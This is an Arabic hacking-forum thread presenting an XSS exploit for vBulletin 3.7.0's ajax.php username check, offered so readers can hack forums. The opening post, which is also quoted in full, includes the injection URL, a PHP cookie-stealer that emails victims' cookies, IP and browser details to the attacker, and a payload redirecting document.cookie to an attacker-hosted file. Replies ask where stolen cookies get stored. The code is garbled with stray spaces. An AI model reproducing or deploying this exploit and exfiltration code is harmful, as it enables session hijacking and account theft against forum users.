:: vBspiders Professional Network :: - ثغرة خطير في vBulletin 3.7.0

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- - ثغرة خطير في vBulletin 3.7.0 (http://www.vbspiders.com/vb/t3282.html)

ثغرة خطير في vBulletin 3.7.0

السلام عليكم

بدون مقدمآت

الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

كود PHP:

    
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #

http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script>

آعمل ملف جديد

كود PHP:

  
File.php

<?

 
$ Ip = $ _SERVER [ ’REMOTE_ADDR’];

$ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’];

$Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’];

$Co okie = $ _GET [ ’c’];

$Myemail = "YOUR E-MAIL;

$Date = today ( "l, j F, Y, g: ia");

$Subject = "Xss th30nR";

$Message = "Th30nuR () 2006

Ip: $ ip

Coo kies: $ coo kies

Browser: $ userAgent

Language: $ accept

URL: Basic $

Day & Time: $ today \\\\ n";

$ From = "From: $ myemail \\\\ r \\\\ n";

Mail ($ myemail, $ subject, $ message, $ from);

?>

تطبيق:

كود PHP:

   www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script

مع انك تشيل الفراغات اللي في coo kie
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz http://www.vbspiders.com/vb/t2298.html يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

اقتباس:

المشاركة الأصلية كتبت بواسطة Da®k H@©K3R (المشاركة 17514)

كود PHP:

    
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #

http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script>

آعمل ملف جديد

كود PHP:

  
File.php

<?

 
$ Ip = $ _SERVER [ ’REMOTE_ADDR’];

$ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’];

$Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’];

$Co okie = $ _GET [ ’c’];

$Myemail = "YOUR E-MAIL;

$Date = today ( "l, j F, Y, g: ia");

$Subject = "Xss th30nR";

$Message = "Th30nuR () 2006

Ip: $ ip

Coo kies: $ coo kies

Browser: $ userAgent

Language: $ accept

URL: Basic $

Day & Time: $ today \\\\ n";

$ From = "From: $ myemail \\\\ r \\\\ n";

Mail ($ myemail, $ subject, $ message, $ from);

?>

تطبيق:

كود PHP:

    
www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script>

 
مع انك تشيل الفراغات اللي في coo kie

وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz http://www.vbspiders.com/vb/t2298.html يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

دائما مبدع كالعادة
شكرا على الاهداء

مشكور على مرورك يا الغالين ننتظروا جديدكم

تسلـــم يا باشا على الثغرة دخان

اخوي عندي كم سؤال

س1: طيب ممكن توضح اكثر اين يخزن الكوكز او الباسورد هل يرسل على الايميل اما ماذا وين احط الايميل او ملف txt عشان تتخزن فيه معلومات الكوكز

س2: الملف هذا هل يمكن ان استخدمه في اي ثغر xss بعض ثغرة الميل روم يحط كود الثغره بعدين قوسين ويكتب xss يعني احط الملف هذا يصلح طبعا بعد رفعه على موقعي الخاص

رجاء الرد انا بحاجه للاجوبه.............................

مشكورين على المرور و بالنسبة للاخ كنكشن ساعمل موضوع عما قريب لجميع اسئلتك لكن اصبر علي شوي لان المدة هذي امتحانات ادعولي شباب

مشكوووور خويا العزيز والله مبدعبطل

شكرا اخي علي الثغرة

مشكوور على الثغرة طخطخطخ

تسلم يدك اخي شكراً جزيلاً لك

العب مع التونسين و مت كالباقيندخان

يعطيك العافيه

لكن النسخه هذي قديمه

ممكن اين نحط ذلك الملف؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟شكراشكراشكراشكراشكراطخطخطخ طخطخطخطخبطل

تسلم حبيبيشكرا

مشكور يا اخي:d

شكرااااااااااااااااااا

شرح جيد حبيبي
و تغرت قوية لكن معضم المنتديات مرقعة منها
وحياك الله

مشكور بارك الله فيك على الشرح